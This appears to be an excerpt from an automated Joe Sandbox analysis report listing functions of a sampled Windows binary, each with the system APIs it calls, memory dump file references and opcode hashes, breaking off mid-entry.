Function 00B8A7FE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3161286bb6a1993f731ac1d9a090df5b304cbe4def24d58b853ee7a0904b789f
Instruction ID: 599f016052876decc1084ce205737110cf12d0aa2656ddb62aa13daf4306f27a
Opcode Fuzzy Hash: 3161286bb6a1993f731ac1d9a090df5b304cbe4def24d58b853ee7a0904b789f
Instruction Fuzzy Hash: 27E06D3520162256F6313A66AC11B6B3AC8DB427A1F1501A3AD09A60B2DF20CC02C3F3

Function 00B6A880 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00B6A83D,?,?,?,?,?,00B9380F,000000FF), ref: 00B6A89B

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 037d2c46d00e847c6084031673c1ad6114c61dab7427b48514e745d56eb11acb
Instruction ID: ad41cbd9f979a9b157df24b5dcce083fef965a3b0e4c74456bb168f82f2adeab
Opcode Fuzzy Hash: 037d2c46d00e847c6084031673c1ad6114c61dab7427b48514e745d56eb11acb
Instruction Fuzzy Hash: 02F0E230085B018FDF308B24C448792B3E4EB12329F040BDED1E3538E0D368698E8F41

Function 00B6B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00B6BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BABD
Part of subcall function 00B6BA94: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAEB
Part of subcall function 00B6BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B6B98B,000000FF,?,?), ref: 00B6BAF7

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B6B991

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: c2d6984dc197717d6cf858741f70db70d44dad2076a88d25035fa7305439a503
Instruction ID: faa54fceb824c82ee7b277247c078d61b7d80e328364d2e02e918e02285c26dc
Opcode Fuzzy Hash: c2d6984dc197717d6cf858741f70db70d44dad2076a88d25035fa7305439a503
Instruction Fuzzy Hash: 1EF08932008790AACA2217B44804FD77BE05F16335F008A89F2FE921D2C77850D59B21

Function 00B72128 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00B7215D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 50b62a010cc05d6072d4218954cccb092fdb501fa29b70e6fb5af242bf1c3448
Instruction ID: 5354b54f6979e3e9e9fe4e57b87905c0f58178bc1af53cc8bc0f0622a6177e08
Opcode Fuzzy Hash: 50b62a010cc05d6072d4218954cccb092fdb501fa29b70e6fb5af242bf1c3448
Instruction Fuzzy Hash: E2D0121165C01052EA263338A856BBD1AD66FD7724F0940E7B21D67193CF98094392B1

Function 00B7B636 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00B7B63C

Part of subcall function 00B7B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B7B3E9

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
Instruction ID: 1e517eb9952c1fc0688319586ae3d0ed7eefa27ca4c0be4f7ec17e33a9719bd2
Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
Instruction Fuzzy Hash: F3D0C73061420976DF416B618C02F7EB6D5DF10344F00C175BA69951D1EBF1DA606965

Function 00B7F747 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00B7F76F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: ad79c3e12ddffd4be8995833c0adb773e4e65637f8b383d34850d3cd45784fdf
Instruction ID: bfd4035fc6a95c54608f71b22d91e771d47c25b816430e2939ef4773fa8fd3a1
Opcode Fuzzy Hash: ad79c3e12ddffd4be8995833c0adb773e4e65637f8b383d34850d3cd45784fdf
Instruction Fuzzy Hash: 4DD01270544206B9C619EB749CC6B7422F0F30CB4BF90C5F5F66E831A1CF658D40862D

Function 00B7EEBD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B72E88), ref: 00B7EEE2

Part of subcall function 00B7C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B7C769
Part of subcall function 00B7C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B7C77A
Part of subcall function 00B7C758: IsDialogMessageW.USER32(000104C2,?), ref: 00B7C78E
Part of subcall function 00B7C758: TranslateMessage.USER32(?), ref: 00B7C79C
Part of subcall function 00B7C758: DispatchMessageW.USER32(?), ref: 00B7C7A6

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 8a944d0b9c3cac0b3545057e6ec8ed5e8fd3c57c8ec2c9167d9c756d84ab553d
Instruction ID: 2d9de52b8a0b1ac4077982e928a0bb42bc125c067e571476cc5223cecfc8e682
Opcode Fuzzy Hash: 8a944d0b9c3cac0b3545057e6ec8ed5e8fd3c57c8ec2c9167d9c756d84ab553d
Instruction Fuzzy Hash: FCD09E31149200AAD7112B51DD06F0A7EE2BB9CB05F004599B299740B18A62AD219B52

Function 00B6AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00B6AA1E), ref: 00B6AB28

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 043c133ab216df0baedfc96cb086eb9fbdb74e5e9a0354e3dc58434e4f562db8
Instruction ID: 635fdace1b373d94de180ebcd75fe6e7d7f5032971cbc0e9d8fe92e8f2c3263a
Opcode Fuzzy Hash: 043c133ab216df0baedfc96cb086eb9fbdb74e5e9a0354e3dc58434e4f562db8
Instruction Fuzzy Hash: D2C08034000105C64E300A34D8640757763FA523757BC93D5C064D50A1C32B8C43ED03

Function 00B7F3BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e78495bd0f49e54fd6c38c1bfeac41851a46f5609eabbf82d276b0fdd8777d7d
Instruction ID: 0b22969d059b4b7b0774224df8d45bc2c142b62b0d67d841f7bd16dc832666e2
Opcode Fuzzy Hash: e78495bd0f49e54fd6c38c1bfeac41851a46f5609eabbf82d276b0fdd8777d7d
Instruction Fuzzy Hash: 76B012932680037E364491162D4BF3602DCC5C0B10330C0FFF018C5041E4806D421039

Function 00B7F3A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c8bf87c2f122a05da928fa6ff380004bf15729ffcd554ca405ab8209b37164ff
Instruction ID: f43db5a51156858b2bc0e70c941d47fc98707332ffdd44970bce30afef82dddd
Opcode Fuzzy Hash: c8bf87c2f122a05da928fa6ff380004bf15729ffcd554ca405ab8209b37164ff
Instruction Fuzzy Hash: 79B012832680037D764491552C4BF3603DCC5C0B10370C4FFF019C1141E4405C451039

Function 00B7F3AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b30a5cde890ca4d5a49c924f732a1011ddde21e207ee93edfe5a35833fa21b93
Instruction ID: 121c1f88d58cb906576bee7969887000024f35b860f9c28bb78ad777c38bd2db
Opcode Fuzzy Hash: b30a5cde890ca4d5a49c924f732a1011ddde21e207ee93edfe5a35833fa21b93
Instruction Fuzzy Hash: BBB012932680037E364491152C4BF3A02DCC5C0B10330C0FFF418C1041E4406C411039

Function 00B7F396 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c092261aa42a98ffb531ff60ed3a0cff7fe452532e37000b68793db9ab22896
Instruction ID: 99c84f39ccb0835ea8428ddf90ec940a5e5baeae146bbadeddde77608da2fc5f
Opcode Fuzzy Hash: 7c092261aa42a98ffb531ff60ed3a0cff7fe452532e37000b68793db9ab22896
Instruction Fuzzy Hash: C7B012832680037D764491162D4BF3602DCC5C0B10330C0FFF018C5141E4905C4A2039

Function 00B7F382 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 70ab97ca86ccb51dda1a8d6ad220e5ebe89eb9616a77686d5463d13949b1988a
Instruction ID: be3d0e9348e26f32d898859c966881d5131fcaa5b7a6702dffaf0e62fab47d3c
Opcode Fuzzy Hash: 70ab97ca86ccb51dda1a8d6ad220e5ebe89eb9616a77686d5463d13949b1988a
Instruction Fuzzy Hash: F4B012832680037D764491152C4BF3A02DCC5C0B10330C0FFF418C1141E4405C451039

Function 00B7F38C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24377941d3d633ab0f87b161b7a3697adb0b46ca7eeaf10a46f378bb72b396e9
Instruction ID: 181951dfe3411f9d45af792406ea8a1a61417f9c17c599c733e7d740e13aa72c
Opcode Fuzzy Hash: 24377941d3d633ab0f87b161b7a3697adb0b46ca7eeaf10a46f378bb72b396e9
Instruction Fuzzy Hash: 28B012832681037D778491152C4BF3602DCC5C0B10330C1FFF018C1141E4405C851039

Function 00B7F3DC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e0f6e74facf6963db29187854e84a937ec54c289d3d804e418e4702018acff5
Instruction ID: 4dbcfaf9556f5b7bc8e4490ae419ce940e3f2163906c01d8d1302e3cb161825e
Opcode Fuzzy Hash: 8e0f6e74facf6963db29187854e84a937ec54c289d3d804e418e4702018acff5
Instruction Fuzzy Hash: CBB012A326A1037D378492152C5BF3602DDC5C0B10330C1FFF018C1041E4409C811039

Function 00B7F3C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ab3d72c6743168d36688d561171ae9957dca5e56c49b92dfe88a739858c67ce3
Instruction ID: 266e8f959d94d9bf570a0944c81391d4c392c50182d112668d3e97ce32ccd7da
Opcode Fuzzy Hash: ab3d72c6743168d36688d561171ae9957dca5e56c49b92dfe88a739858c67ce3
Instruction Fuzzy Hash: 91B012932680037E364491162C4BF3602DCC5C0B10330C0FFF018C5041E4406C411039

Function 00B7F32B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7c75e6e00160082855b03a1b6bf57dd42f4344a82b101e3f89cf8aaea53616c
Instruction ID: e25a4b2e5c56349b0808cb05c5b73bb3ec4fe69f8c2cbc7174863152c7b04738
Opcode Fuzzy Hash: b7c75e6e00160082855b03a1b6bf57dd42f4344a82b101e3f89cf8aaea53616c
Instruction Fuzzy Hash: E9B012832680037E361451112C4FE7602DCC5C0B10331C0FFF014D0041F4405C411039

Function 00B7F378 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D

